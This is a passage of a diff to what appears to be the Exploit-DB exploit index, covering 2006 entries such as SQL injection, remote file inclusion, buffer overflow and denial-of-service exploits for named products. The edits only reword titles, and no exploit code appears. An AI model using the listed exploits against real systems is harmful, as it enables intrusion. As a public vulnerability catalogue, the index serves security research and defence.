Exploit",2006-05-05,landser,linux,remote,0 -1751,platforms/php/webapps/1751.php,"Limbo CMS <= 1.0.4.2 - (catid) Remote SQL Injection Exploit",2006-05-05,[Oo],php,webapps,0 +1751,platforms/php/webapps/1751.php,"Limbo CMS 1.0.4.2 - (catid) SQL Injection Exploit",2006-05-05,[Oo],php,webapps,0 1752,platforms/php/webapps/1752.pl,"StatIt 4 - (statitpath) Remote File Inclusion Exploit",2006-05-05,IGNOR3,php,webapps,0 -1753,platforms/php/webapps/1753.txt,"TotalCalendar <= 2.30 - (inc) Remote File Include",2006-05-05,Aesthetico,php,webapps,0 -1754,platforms/windows/dos/1754.py,"FileCOPA FTP Server <= 1.01 - (USER) Remote Pre-Auth DoS",2006-05-05,Bigeazer,windows,dos,0 +1753,platforms/php/webapps/1753.txt,"TotalCalendar 2.30 - (inc) Remote File Inclusion",2006-05-05,Aesthetico,php,webapps,0 +1754,platforms/windows/dos/1754.py,"FileCOPA FTP Server 1.01 - (USER) Remote Pre-Auth DoS",2006-05-05,Bigeazer,windows,dos,0 1755,platforms/cgi/webapps/1755.py,"AWStats 6.5 - (migrate) Remote Shell Command Injection",2006-05-06,redsand,cgi,webapps,0 -1756,platforms/php/webapps/1756.pl,"HiveMail <= 1.3 - (addressbook.add.php) Remote Code Execution Exploit",2006-05-06,[Oo],php,webapps,0 +1756,platforms/php/webapps/1756.pl,"HiveMail 1.3 - (addressbook.add.php) Remote Code Execution Exploit",2006-05-06,[Oo],php,webapps,0 1757,platforms/windows/dos/1757.c,"acFTP FTP Server 1.4 - (USER) Remote Denial of Service",2006-05-06,Omni,windows,dos,0 -1758,platforms/windows/dos/1758.pl,"TinyFTPD <= 1.4 - (USER) Remote Buffer Overflow DoS",2006-05-06,[Oo],windows,dos,0 -1759,platforms/asp/webapps/1759.txt,"VP-ASP 6.00 - (shopcurrency.asp) Remote SQL Injection",2006-05-06,tracewar,asp,webapps,0 +1758,platforms/windows/dos/1758.pl,"TinyFTPD 1.4 - (USER) Remote Buffer Overflow DoS",2006-05-06,[Oo],windows,dos,0 +1759,platforms/asp/webapps/1759.txt,"VP-ASP 6.00 - (shopcurrency.asp) SQL Injection",2006-05-06,tracewar,asp,webapps,0 1760,platforms/php/webapps/1760.php,"PHP-Fusion 6.00.306 - Multiple Vulnerabilities",2006-05-07,rgod,php,webapps,0 1761,platforms/php/webapps/1761.pl,"Jetbox CMS 2.1 - (relative_script_path) Remote File Inclusion",2006-05-07,beford,php,webapps,0 1763,platforms/php/webapps/1763.txt,"ACal 2.2.6 - (day.php) Remote File Inclusion",2006-05-07,PiNGuX,php,webapps,0 1764,platforms/php/webapps/1764.txt,"EQdkp 1.3.0 - (dbal.php) Remote File Inclusion",2006-05-07,OLiBekaS,php,webapps,0 -1765,platforms/php/webapps/1765.pl,"Dokeos Lms <= 1.6.4 - (authldap.php) Remote File Include Exploit",2006-05-08,beford,php,webapps,0 +1765,platforms/php/webapps/1765.pl,"Dokeos Lms 1.6.4 - (authldap.php) Remote File Inclusion Exploit",2006-05-08,beford,php,webapps,0 1766,platforms/php/webapps/1766.pl,"Claroline e-Learning 1.75 - (ldap.inc.php) Remote File Inclusion Exploit",2006-05-08,beford,php,webapps,0 -1767,platforms/php/webapps/1767.txt,"ActualAnalyzer Server <= 8.23 - (rf) Remote File Include",2006-05-08,Aesthetico,php,webapps,0 -1768,platforms/php/webapps/1768.php,"ActualAnalyzer Pro <= 6.88 - (rf) Remote File Include Exploit",2006-05-08,ReZEN,php,webapps,0 -1769,platforms/php/webapps/1769.txt,"phpListPro <= 2.01 - Multiple Remote File Include Vulnerabilities",2006-05-08,Aesthetico,php,webapps,0 +1767,platforms/php/webapps/1767.txt,"ActualAnalyzer Server 8.23 - (rf) Remote File Inclusion",2006-05-08,Aesthetico,php,webapps,0 +1768,platforms/php/webapps/1768.php,"ActualAnalyzer Pro 6.88 - (rf) Remote File Inclusion Exploit",2006-05-08,ReZEN,php,webapps,0 +1769,platforms/php/webapps/1769.txt,"phpListPro 2.01 - Multiple Remote File Inclusion Vulnerabilities",2006-05-08,Aesthetico,php,webapps,0 1772,platforms/windows/local/1772.c,"Intel Wireless Service (s24evmon.exe) Shared Memory Exploit",2006-05-09,"Ruben Santamarta ",windows,local,0 -1773,platforms/php/webapps/1773.txt,"phpRaid <= 3.0.b3 - (phpBB/SMF) Remote File Inclusion Vulnerabilities",2006-05-09,"Kurdish Security",php,webapps,0 -1774,platforms/php/webapps/1774.txt,"pafileDB <= 2.0.1 - (mxBB/phpBB) Remote File Inclusion",2006-05-09,Darkfire,php,webapps,0 +1773,platforms/php/webapps/1773.txt,"phpRaid 3.0.b3 - (phpBB/SMF) Remote File Inclusion Vulnerabilities",2006-05-09,"Kurdish Security",php,webapps,0 +1774,platforms/php/webapps/1774.txt,"pafileDB 2.0.1 - (mxBB/phpBB) Remote File Inclusion",2006-05-09,Darkfire,php,webapps,0 1775,platforms/windows/dos/1775.html,"Microsoft Internet Explorer 6.0.2900 SP2 - (CSS Attribute) Denial of Service",2006-05-10,seven,windows,dos,0 1776,platforms/windows/remote/1776.c,"Medal of Honor (getinfo) Remote Buffer Overflow Exploit",2006-05-10,RunningBon,windows,remote,12203 1777,platforms/php/webapps/1777.php,"Unclassified NewsBoard 1.6.1 patch 1 - Local File Inclusion",2006-05-11,rgod,php,webapps,0 -1778,platforms/php/webapps/1778.txt,"Foing <= 0.7.0 - (phpBB) Remote File Inclusion",2006-05-12,"Kurdish Security",php,webapps,0 -1779,platforms/php/webapps/1779.txt,"Php Blue Dragon CMS <= 2.9 - Remote File Include",2006-05-12,Kacper,php,webapps,0 -1780,platforms/php/webapps/1780.php,"phpBB <= 2.0.20 - (Admin/Restore DB/default_lang) Remote Exploit",2006-05-13,rgod,php,webapps,0 -1781,platforms/windows/dos/1781.txt,"outgun <= 1.0.3 bot 2 - Multiple Vulnerabilities",2006-05-14,"Luigi Auriemma",windows,dos,0 -1782,platforms/windows/dos/1782.txt,"Empire <= 4.3.2 - (strncat) Denial of Service Exploit",2006-05-14,"Luigi Auriemma",windows,dos,0 -1783,platforms/windows/dos/1783.txt,"Genecys <= 0.2 - (BoF/NULL pointer) Denial of Service Exploit",2006-05-14,"Luigi Auriemma",windows,dos,0 -1784,platforms/windows/dos/1784.txt,"raydium <= svn 309 - Multiple Vulnerabilities",2006-05-14,"Luigi Auriemma",windows,dos,0 -1785,platforms/php/webapps/1785.php,"Sugar Suite Open Source <= 4.2 - (OptimisticLock) Remote Exploit",2006-05-14,rgod,php,webapps,0 -1787,platforms/windows/remote/1787.py,"freeSSHd <= 1.0.9 - Key Exchange Algorithm Buffer Overflow Exploit",2006-05-15,"Tauqeer Ahmad",windows,remote,22 -1788,platforms/windows/remote/1788.pm,"PuTTy.exe <= 0.53 - (validation) Remote Buffer Overflow Exploit (Metasploit)",2006-05-15,y0,windows,remote,0 -1789,platforms/php/webapps/1789.txt,"TR Newsportal <= 0.36tr1 - (poll.php) Remote File Inclusion",2006-05-15,Kacper,php,webapps,0 -1790,platforms/php/webapps/1790.txt,"Squirrelcart <= 2.2.0 - (cart_content.php) Remote Inclusion",2006-05-15,OLiBekaS,php,webapps,0 +1778,platforms/php/webapps/1778.txt,"Foing 0.7.0 - (phpBB) Remote File Inclusion",2006-05-12,"Kurdish Security",php,webapps,0 +1779,platforms/php/webapps/1779.txt,"Php Blue Dragon CMS 2.9 - Remote File Inclusion",2006-05-12,Kacper,php,webapps,0 +1780,platforms/php/webapps/1780.php,"phpBB 2.0.20 - (Admin/Restore DB/default_lang) Remote Exploit",2006-05-13,rgod,php,webapps,0 +1781,platforms/windows/dos/1781.txt,"outgun 1.0.3 bot 2 - Multiple Vulnerabilities",2006-05-14,"Luigi Auriemma",windows,dos,0 +1782,platforms/windows/dos/1782.txt,"Empire 4.3.2 - (strncat) Denial of Service Exploit",2006-05-14,"Luigi Auriemma",windows,dos,0 +1783,platforms/windows/dos/1783.txt,"Genecys 0.2 - (BoF/NULL pointer) Denial of Service Exploit",2006-05-14,"Luigi Auriemma",windows,dos,0 +1784,platforms/windows/dos/1784.txt,"raydium svn 309 - Multiple Vulnerabilities",2006-05-14,"Luigi Auriemma",windows,dos,0 +1785,platforms/php/webapps/1785.php,"Sugar Suite Open Source 4.2 - (OptimisticLock) Remote Exploit",2006-05-14,rgod,php,webapps,0 +1787,platforms/windows/remote/1787.py,"freeSSHd 1.0.9 - Key Exchange Algorithm Buffer Overflow Exploit",2006-05-15,"Tauqeer Ahmad",windows,remote,22 +1788,platforms/windows/remote/1788.pm,"PuTTy.exe 0.53 - (validation) Remote Buffer Overflow Exploit (Metasploit)",2006-05-15,y0,windows,remote,0 +1789,platforms/php/webapps/1789.txt,"TR Newsportal 0.36tr1 - (poll.php) Remote File Inclusion",2006-05-15,Kacper,php,webapps,0 +1790,platforms/php/webapps/1790.txt,"Squirrelcart 2.2.0 - (cart_content.php) Remote Inclusion",2006-05-15,OLiBekaS,php,webapps,0 1791,platforms/multiple/remote/1791.patch,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass (Patched EXE)",2006-05-16,redsand,multiple,remote,5900 -1792,platforms/windows/dos/1792.txt,"GNUnet <= 0.7.0d - (Empty UDP Packet) Remote Denial of Service Exploit",2006-05-15,"Luigi Auriemma",windows,dos,0 -1793,platforms/php/webapps/1793.pl,"DeluxeBB <= 1.06 - (name) Remote SQL Injection Exploit (mq=off)",2006-05-15,KingOfSka,php,webapps,0 +1792,platforms/windows/dos/1792.txt,"GNUnet 0.7.0d - (Empty UDP Packet) Remote Denial of Service Exploit",2006-05-15,"Luigi Auriemma",windows,dos,0 +1793,platforms/php/webapps/1793.pl,"DeluxeBB 1.06 - (name) SQL Injection Exploit (mq=off)",2006-05-15,KingOfSka,php,webapps,0 1794,platforms/multiple/remote/1794.pm,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass Exploit (Metasploit)",2006-05-15,"H D Moore",multiple,remote,5900 -1795,platforms/php/webapps/1795.txt,"ezusermanager <= 1.6 - Remote File Inclusion",2006-05-15,OLiBekaS,php,webapps,0 -1796,platforms/php/webapps/1796.php,"PHP-Fusion <= 6.00.306 - (srch_where) SQL Injection Exploit",2006-05-16,rgod,php,webapps,0 -1797,platforms/php/webapps/1797.php,"DeluxeBB <= 1.06 - (Attachment mod_mime) Remote Exploit",2006-05-16,rgod,php,webapps,0 -1798,platforms/php/webapps/1798.txt,"Quezza BB <= 1.0 - (quezza_root_path) File Inclusion",2006-05-17,nukedx,php,webapps,0 +1795,platforms/php/webapps/1795.txt,"ezusermanager 1.6 - Remote File Inclusion",2006-05-15,OLiBekaS,php,webapps,0 +1796,platforms/php/webapps/1796.php,"PHP-Fusion 6.00.306 - (srch_where) SQL Injection Exploit",2006-05-16,rgod,php,webapps,0 +1797,platforms/php/webapps/1797.php,"DeluxeBB 1.06 - (Attachment mod_mime) Remote Exploit",2006-05-16,rgod,php,webapps,0 +1798,platforms/php/webapps/1798.txt,"Quezza BB 1.0 - (quezza_root_path) File Inclusion",2006-05-17,nukedx,php,webapps,0 1799,platforms/multiple/remote/1799.txt,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Scanner",2006-05-17,class101,multiple,remote,0 -1800,platforms/php/webapps/1800.txt,"ScozNews <= 1.2.1 - (mainpath) Remote File Inclusion",2006-05-17,Kacper,php,webapps,0 -1801,platforms/multiple/dos/1801.txt,"libextractor <= 0.5.13 - Multiple Heap Overflow PoC Exploits",2006-05-17,"Luigi Auriemma",multiple,dos,0 -1802,platforms/multiple/dos/1802.html,"Mozilla Firefox <= 1.5.0.3 - (Loop) Denial of Service Exploit",2006-05-18,"Gianni Amato",multiple,dos,0 -1804,platforms/php/webapps/1804.txt,"phpBazar <= 2.1.0 - Remote (Include/Auth Bypass) Vulnerabilities",2006-05-19,[Oo],php,webapps,0 -1805,platforms/php/webapps/1805.pl,"phpListPro <= 2.0.1 - (Language) Remote Code Execution Exploit",2006-05-19,[Oo],php,webapps,0 +1800,platforms/php/webapps/1800.txt,"ScozNews 1.2.1 - (mainpath) Remote File Inclusion",2006-05-17,Kacper,php,webapps,0 +1801,platforms/multiple/dos/1801.txt,"libextractor 0.5.13 - Multiple Heap Overflow PoC Exploits",2006-05-17,"Luigi Auriemma",multiple,dos,0 +1802,platforms/multiple/dos/1802.html,"Mozilla Firefox 1.5.0.3 - (Loop) Denial of Service Exploit",2006-05-18,"Gianni Amato",multiple,dos,0 +1804,platforms/php/webapps/1804.txt,"phpBazar 2.1.0 - Remote (Include/Auth Bypass) Vulnerabilities",2006-05-19,[Oo],php,webapps,0 +1805,platforms/php/webapps/1805.pl,"phpListPro 2.0.1 - (Language) Remote Code Execution Exploit",2006-05-19,[Oo],php,webapps,0 1806,platforms/windows/local/1806.c,"IntelliTamper 2.07 - (.map) Local Arbitrary Code Execution Exploit",2006-05-19,Devil-00,windows,local,0 -1807,platforms/asp/webapps/1807.txt,"Zix Forum <= 1.12 - (layid) SQL Injection",2006-05-19,FarhadKey,asp,webapps,0 -1808,platforms/php/webapps/1808.txt,"phpMyDirectory <= 10.4.4 - (ROOT_PATH) Remote Inclusion",2006-05-19,OLiBekaS,php,webapps,0 -1809,platforms/php/webapps/1809.txt,"CaLogic Calendars 1.2.2 - (CLPath) Remote File Include Vulnerabilities",2006-05-20,Kacper,php,webapps,0 -1810,platforms/php/webapps/1810.pl,"Woltlab Burning Board <= 2.3.5 - (links.php) SQL Injection Exploit",2006-05-20,666,php,webapps,0 -1811,platforms/php/webapps/1811.php,"XOOPS <= 2.0.13.2 - xoopsOption[nocommon] Remote Exploit",2006-05-21,rgod,php,webapps,0 -1812,platforms/php/webapps/1812.pl,"Fusion News 1.0 (fil_config) - Remote File Inclusion (RFI)",2006-05-21,X0r_1,php,webapps,0 +1807,platforms/asp/webapps/1807.txt,"Zix Forum 1.12 - (layid) SQL Injection",2006-05-19,FarhadKey,asp,webapps,0 +1808,platforms/php/webapps/1808.txt,"phpMyDirectory 10.4.4 - (ROOT_PATH) Remote Inclusion",2006-05-19,OLiBekaS,php,webapps,0 +1809,platforms/php/webapps/1809.txt,"CaLogic Calendars 1.2.2 - (CLPath) Remote File Inclusion Vulnerabilities",2006-05-20,Kacper,php,webapps,0 +1810,platforms/php/webapps/1810.pl,"Woltlab Burning Board 2.3.5 - (links.php) SQL Injection Exploit",2006-05-20,666,php,webapps,0 +1811,platforms/php/webapps/1811.php,"XOOPS 2.0.13.2 - xoopsOption[nocommon] Remote Exploit",2006-05-21,rgod,php,webapps,0 +1812,platforms/php/webapps/1812.pl,"Fusion News 1.0 (fil_config) - Remote File Inclusion",2006-05-21,X0r_1,php,webapps,0 1813,platforms/linux/remote/1813.c,"Cyrus IMAPD 2.3.2 - (pop3d) Remote Buffer Overflow Exploit",2006-05-21,kingcope,linux,remote,110 1814,platforms/php/webapps/1814.txt,"UBB Threads 6.4.x-6.5.2 - (thispath) Remote File Inclusion",2006-05-22,V4mu,php,webapps,0 1815,platforms/linux/dos/1815.c,"portmap 5 beta (Set/Dump) Local Denial of Service Exploit",2006-05-22,"Federico L. Bossi Bonin",linux,dos,0 -1816,platforms/php/webapps/1816.php,"Nucleus CMS <= 3.22 - (DIR_LIBS) Arbitrary Remote Inclusion Exploit",2006-05-23,rgod,php,webapps,0 -1817,platforms/php/webapps/1817.txt,"Docebo <= 3.0.3 - Multiple Remote File Include Vulnerabilities",2006-05-23,Kacper,php,webapps,0 -1818,platforms/php/webapps/1818.txt,"phpCommunityCalendar <= 4.0.3 - Multiple (XSS/SQL) Vulnerabilities",2006-05-23,X0r_1,php,webapps,0 +1816,platforms/php/webapps/1816.php,"Nucleus CMS 3.22 - (DIR_LIBS) Arbitrary Remote Inclusion Exploit",2006-05-23,rgod,php,webapps,0 +1817,platforms/php/webapps/1817.txt,"Docebo 3.0.3 - Multiple Remote File Inclusion Vulnerabilities",2006-05-23,Kacper,php,webapps,0 +1818,platforms/php/webapps/1818.txt,"phpCommunityCalendar 4.0.3 - Multiple (XSS/SQL) Vulnerabilities",2006-05-23,X0r_1,php,webapps,0 1819,platforms/multiple/dos/1819.txt,"PunkBuster < 1.229 - (WebTool Service) Remote Buffer Overflow DoS",2006-05-23,"Luigi Auriemma",multiple,dos,0 1820,platforms/multiple/dos/1820.txt,"netPanzer 0.8 rev 952 - (frameNum) Server Terminiation Exploit",2006-05-23,"Luigi Auriemma",multiple,dos,0 -1821,platforms/php/webapps/1821.php,"Drupal <= 4.7 - (attachment mod_mime) Remote Exploit",2006-05-24,rgod,php,webapps,0 -1823,platforms/php/webapps/1823.txt,"BASE <= 1.2.4 - melissa (Snort Frontend) Remote Inclusion Vulnerabilities",2006-05-25,str0ke,php,webapps,0 -1824,platforms/php/webapps/1824.txt,"open-medium.CMS <= 0.25 - (404.php) Remote File Include",2006-05-25,Kacper,php,webapps,0 -1825,platforms/php/webapps/1825.txt,"Back-End CMS <= 0.7.2.2 - (BE_config.php) Remote Include",2006-05-25,Kacper,php,webapps,0 -1826,platforms/php/webapps/1826.txt,"Socketmail <= 2.2.6 - (site_path) Remote File Include",2006-05-25,Aesthetico,php,webapps,0 -1827,platforms/php/webapps/1827.txt,"V-Webmail <= 1.6.4 - (pear_dir) Remote File Include",2006-05-25,beford,php,webapps,0 -1828,platforms/php/webapps/1828.txt,"DoceboLms <= 2.0.5 - (help.php) Remote File Include",2006-05-25,beford,php,webapps,0 -1829,platforms/php/webapps/1829.txt,"APC ActionApps CMS 2.8.1 - Remote File Include Vulnerabilities",2006-05-25,Kacper,php,webapps,0 -1831,platforms/linux/local/1831.txt,"tiffsplit (libtiff <= 3.8.2) - Local Stack Buffer Overflow PoC",2006-05-26,nitr0us,linux,local,0 -1832,platforms/php/webapps/1832.txt,"Plume CMS <= 1.0.3 - (manager_path) Remote File Include",2006-05-26,beford,php,webapps,0 +1821,platforms/php/webapps/1821.php,"Drupal 4.7 - (attachment mod_mime) Remote Exploit",2006-05-24,rgod,php,webapps,0 +1823,platforms/php/webapps/1823.txt,"BASE 1.2.4 - melissa (Snort Frontend) Remote Inclusion Vulnerabilities",2006-05-25,str0ke,php,webapps,0 +1824,platforms/php/webapps/1824.txt,"open-medium.CMS 0.25 - (404.php) Remote File Inclusion",2006-05-25,Kacper,php,webapps,0 +1825,platforms/php/webapps/1825.txt,"Back-End CMS 0.7.2.2 - (BE_config.php) Remote Include",2006-05-25,Kacper,php,webapps,0 +1826,platforms/php/webapps/1826.txt,"Socketmail 2.2.6 - (site_path) Remote File Inclusion",2006-05-25,Aesthetico,php,webapps,0 +1827,platforms/php/webapps/1827.txt,"V-Webmail 1.6.4 - (pear_dir) Remote File Inclusion",2006-05-25,beford,php,webapps,0 +1828,platforms/php/webapps/1828.txt,"DoceboLms 2.0.5 - (help.php) Remote File Inclusion",2006-05-25,beford,php,webapps,0 +1829,platforms/php/webapps/1829.txt,"APC ActionApps CMS 2.8.1 - Remote File Inclusion Vulnerabilities",2006-05-25,Kacper,php,webapps,0 +1831,platforms/linux/local/1831.txt,"tiffsplit (libtiff 3.8.2) - Local Stack Buffer Overflow PoC",2006-05-26,nitr0us,linux,local,0 +1832,platforms/php/webapps/1832.txt,"Plume CMS 1.0.3 - (manager_path) Remote File Inclusion",2006-05-26,beford,php,webapps,0 1833,platforms/asp/webapps/1833.txt,"qjForum (member.asp) SQL Injection",2006-05-26,ajann,asp,webapps,0 1834,platforms/asp/webapps/1834.asp,"Easy-Content Forums 1.0 - Multiple SQL/XSS Vulnerabilities",2006-05-26,ajann,asp,webapps,0 -1835,platforms/php/webapps/1835.txt,"Hot Open Tickets <= 11012004 - (CLASS_PATH) Remote Include",2006-05-27,Kacper,php,webapps,0 -1836,platforms/asp/webapps/1836.txt,"PrideForum 1.0 - (forum.asp) Remote SQL Injection",2006-05-27,ajann,asp,webapps,0 -1837,platforms/asp/webapps/1837.pl,"MiniNuke 2.x - (create an admin) Remote SQL Injection Exploit",2006-05-27,nukedx,asp,webapps,0 +1835,platforms/php/webapps/1835.txt,"Hot Open Tickets 11012004 - (CLASS_PATH) Remote File Inclusion",2006-05-27,Kacper,php,webapps,0 +1836,platforms/asp/webapps/1836.txt,"PrideForum 1.0 - (forum.asp) SQL Injection",2006-05-27,ajann,asp,webapps,0 +1837,platforms/asp/webapps/1837.pl,"MiniNuke 2.x - (create an admin) SQL Injection Exploit",2006-05-27,nukedx,asp,webapps,0 1838,platforms/windows/dos/1838.html,"Microsoft Internet Explorer - (HTML Tag) Memory Corruption (MS06-013)",2006-05-27,"Thomas Waldegger",windows,dos,0 -1839,platforms/php/webapps/1839.txt,"tinyBB <= 0.3 - Remote (Include / SQL Injection) Vulnerabilities",2006-05-28,nukedx,php,webapps,0 -1840,platforms/asp/webapps/1840.txt,"Enigma Haber <= 4.3 - Multiple Remote SQL Injection Vulnerabilities",2006-05-28,nukedx,asp,webapps,0 -1841,platforms/php/webapps/1841.txt,"F@cile Interactive Web <= 0.8x Remote (Include / XSS) Vulnerabilities",2006-05-28,nukedx,php,webapps,0 +1839,platforms/php/webapps/1839.txt,"tinyBB 0.3 - Remote (Include / SQL Injection) Vulnerabilities",2006-05-28,nukedx,php,webapps,0 +1840,platforms/asp/webapps/1840.txt,"Enigma Haber 4.3 - Multiple SQL Injection Vulnerabilities",2006-05-28,nukedx,asp,webapps,0 +1841,platforms/php/webapps/1841.txt,"F@cile Interactive Web 0.8x - Remote (Include / XSS) Vulnerabilities",2006-05-28,nukedx,php,webapps,0 1842,platforms/php/webapps/1842.htm,"Eggblog < 3.07 - Remote (SQL Injection / Privilege Escalation) Exploit",2006-05-28,nukedx,php,webapps,0 1843,platforms/php/webapps/1843.txt,"UBB Threads 5.x / 6.x - Multiple Remote File Inclusion Vulnerabilities",2006-05-28,nukedx,php,webapps,0 -1844,platforms/php/webapps/1844.txt,"Activity MOD Plus <= 1.1.0 - (phpBB Mod) File Inclusion",2006-05-28,nukedx,php,webapps,0 -1845,platforms/asp/webapps/1845.txt,"ASPSitem <= 2.0 - Remote (SQL Injection / DB Disclosure) Vulnerabilities",2006-05-28,nukedx,asp,webapps,0 -1846,platforms/php/webapps/1846.txt,"Blend Portal <= 1.2.0 - (phpBB Mod) Remote File Inclusion",2006-05-28,nukedx,php,webapps,0 -1847,platforms/php/webapps/1847.txt,"CosmicShoppingCart (search.php) Remote SQL Injection",2006-05-28,Vympel,php,webapps,0 +1844,platforms/php/webapps/1844.txt,"Activity MOD Plus 1.1.0 - (phpBB Mod) File Inclusion",2006-05-28,nukedx,php,webapps,0 +1845,platforms/asp/webapps/1845.txt,"ASPSitem 2.0 - Remote (SQL Injection / DB Disclosure) Vulnerabilities",2006-05-28,nukedx,asp,webapps,0 +1846,platforms/php/webapps/1846.txt,"Blend Portal 1.2.0 - (phpBB Mod) Remote File Inclusion",2006-05-28,nukedx,php,webapps,0 +1847,platforms/php/webapps/1847.txt,"CosmicShoppingCart (search.php) SQL Injection",2006-05-28,Vympel,php,webapps,0 1848,platforms/php/webapps/1848.txt,"Fastpublish CMS 1.6.9 - config[fsBase] Remote Include Vulnerabilities",2006-05-29,Kacper,php,webapps,0 1849,platforms/asp/webapps/1849.htm,"Speedy ASP Forum (profileupdate.asp) User Pass Change Exploit",2006-05-29,ajann,asp,webapps,0 -1850,platforms/asp/webapps/1850.htm,"Nukedit CMS <= 4.9.6 Unauthorized Admin Add Exploit",2006-05-29,FarhadKey,asp,webapps,0 -1851,platforms/php/webapps/1851.txt,"gnopaste <= 0.5.3 - (common.php) Remote File Include",2006-05-30,SmokeZ,php,webapps,0 +1850,platforms/asp/webapps/1850.htm,"Nukedit CMS 4.9.6 Unauthorized Admin Add Exploit",2006-05-29,FarhadKey,asp,webapps,0 +1851,platforms/php/webapps/1851.txt,"gnopaste 0.5.3 - (common.php) Remote File Inclusion",2006-05-30,SmokeZ,php,webapps,0 1852,platforms/linux/dos/1852.c,"gxine 0.5.6 - (HTTP Plugin) Remote Buffer Overflow PoC",2006-05-30,"Federico L. Bossi Bonin",linux,dos,0 -1853,platforms/php/webapps/1853.php,"pppBlog <= 0.3.8 - (randompic.php) System Disclosure Exploit",2006-05-31,rgod,php,webapps,0 -1854,platforms/php/webapps/1854.txt,"Ottoman CMS <= 1.1.3 - (default_path) Remote File Include Vulnerabilities",2006-05-31,Kacper,php,webapps,0 -1855,platforms/php/webapps/1855.txt,"metajour 2.1 - (system_path) Remote File Include Vulnerabilities",2006-05-31,Kacper,php,webapps,0 -1856,platforms/windows/dos/1856.url,"Microsoft Internet Explorer (inetconn.dll) Stack Overflow Crash",2006-05-31,Mr.Niega,windows,dos,0 -1857,platforms/php/webapps/1857.pl,"TinyPHP Forum <= 3.6 - (profile.php) Remote Code Execution Exploit",2006-06-01,Hessam-x,php,webapps,0 -1858,platforms/php/webapps/1858.txt,"AssoCIateD CMS 1.1.3 - (root_path) Remote File Include",2006-06-01,Kacper,php,webapps,0 -1859,platforms/asp/webapps/1859.htm,"aspWebLinks 2.0 - Remote SQL Injection / Admin Pass Change Exploit",2006-06-01,ajann,asp,webapps,0 -1860,platforms/php/webapps/1860.txt,"Bytehoard 2.1 - (server.php) Remote File Include",2006-06-01,beford,php,webapps,0 -1861,platforms/php/webapps/1861.txt,"Redaxo CMS <= 3.2 - (INCLUDE_PATH) Remote File Include Vulnerabilities",2006-06-02,beford,php,webapps,0 +1853,platforms/php/webapps/1853.php,"pppBlog 0.3.8 - (randompic.php) System Disclosure Exploit",2006-05-31,rgod,php,webapps,0 +1854,platforms/php/webapps/1854.txt,"Ottoman CMS 1.1.3 - (default_path) Remote File Inclusion",2006-05-31,Kacper,php,webapps,0 +1855,platforms/php/webapps/1855.txt,"metajour 2.1 - (system_path) Remote File Inclusion",2006-05-31,Kacper,php,webapps,0 +1856,platforms/windows/dos/1856.url,"Microsoft Internet Explorer 6 - (inetconn.dll) Stack Overflow Crash",2006-05-31,Mr.Niega,windows,dos,0 +1857,platforms/php/webapps/1857.pl,"TinyPHP Forum 3.6 - (profile.php) Remote Code Execution Exploit",2006-06-01,Hessam-x,php,webapps,0 +1858,platforms/php/webapps/1858.txt,"AssoCIateD CMS 1.1.3 - (root_path) Remote File Inclusion",2006-06-01,Kacper,php,webapps,0 +1859,platforms/asp/webapps/1859.htm,"aspWebLinks 2.0 - SQL Injection / Admin Pass Change Exploit",2006-06-01,ajann,asp,webapps,0 +1860,platforms/php/webapps/1860.txt,"Bytehoard 2.1 - (server.php) Remote File Inclusion",2006-06-01,beford,php,webapps,0 +1861,platforms/php/webapps/1861.txt,"Redaxo CMS 3.2 - (INCLUDE_PATH) Remote File Inclusion Vulnerabilities",2006-06-02,beford,php,webapps,0 1862,platforms/cgi/webapps/1862.c,"iShopCart vGetPost() Remote Buffer Overflow Exploit (cgi)",2006-06-02,K-sPecial,cgi,webapps,0 -1863,platforms/php/webapps/1863.txt,"Igloo <= 0.1.9 - (Wiki.php) Remote File Include",2006-06-02,Kacper,php,webapps,0 -1864,platforms/php/webapps/1864.txt,"ashNews 0.83 - (pathtoashnews) Remote File Include Vulnerabilities",2006-06-02,Kacper,php,webapps,0 -1865,platforms/php/webapps/1865.txt,"Informium 0.12.0 - (common-menu.php) Remote File Include Vulnerabilities",2006-06-02,Kacper,php,webapps,0 -1866,platforms/php/webapps/1866.txt,"PHP-Nuke <= 7.9 Final (phpbb_root_path) Remote File Inclusions",2006-06-02,ddoshomo,php,webapps,0 -1867,platforms/multiple/dos/1867.html,"Mozilla Firefox <= 1.5.0.4 - (marquee) Denial of Service Exploit",2006-06-02,n00b,multiple,dos,0 -1868,platforms/php/webapps/1868.php,"Pixelpost <= 1-5rc1-2 - Remote Privilege Escalation Exploit",2006-06-03,rgod,php,webapps,0 -1869,platforms/php/webapps/1869.php,"DotClear <= 1.2.4 - (prepend.php) Arbitrary Remote Inclusion Exploit",2006-06-03,rgod,php,webapps,0 -1870,platforms/php/webapps/1870.txt,"BlueShoes Framework <= 4.6 - Remote File Include Vulnerabilities",2006-06-03,Kacper,php,webapps,0 -1871,platforms/php/webapps/1871.txt,"WebspotBlogging <= 3.0.1 - (path) Remote File Include",2006-06-03,Kacper,php,webapps,0 -1872,platforms/php/webapps/1872.txt,"CS-Cart <= 1.3.3 - (classes_dir) Remote File Include",2006-06-03,Kacper,php,webapps,0 -1873,platforms/asp/webapps/1873.txt,"ProPublish 2.0 - (catid) Remote SQL Injection",2006-06-03,FarhadKey,asp,webapps,0 -1874,platforms/php/webapps/1874.php,"LifeType <= 1.0.4 - SQL Injection / Admin Credentials Disclosure Exploit",2006-06-03,rgod,php,webapps,0 +1863,platforms/php/webapps/1863.txt,"Igloo 0.1.9 - (Wiki.php) Remote File Inclusion",2006-06-02,Kacper,php,webapps,0 +1864,platforms/php/webapps/1864.txt,"ashNews 0.83 - (pathtoashnews) Remote File Inclusion Vulnerabilities",2006-06-02,Kacper,php,webapps,0 +1865,platforms/php/webapps/1865.txt,"Informium 0.12.0 - (common-menu.php) Remote File Inclusion Vulnerabilities",2006-06-02,Kacper,php,webapps,0 +1866,platforms/php/webapps/1866.txt,"PHP-Nuke 7.9 Final (phpbb_root_path) Remote File Inclusions",2006-06-02,ddoshomo,php,webapps,0 +1867,platforms/multiple/dos/1867.html,"Mozilla Firefox 1.5.0.4 - (marquee) Denial of Service Exploit",2006-06-02,n00b,multiple,dos,0 +1868,platforms/php/webapps/1868.php,"Pixelpost 1-5rc1-2 - Remote Privilege Escalation Exploit",2006-06-03,rgod,php,webapps,0 +1869,platforms/php/webapps/1869.php,"DotClear 1.2.4 - (prepend.php) Arbitrary Remote Inclusion Exploit",2006-06-03,rgod,php,webapps,0 +1870,platforms/php/webapps/1870.txt,"BlueShoes Framework 4.6 - Remote File Inclusion 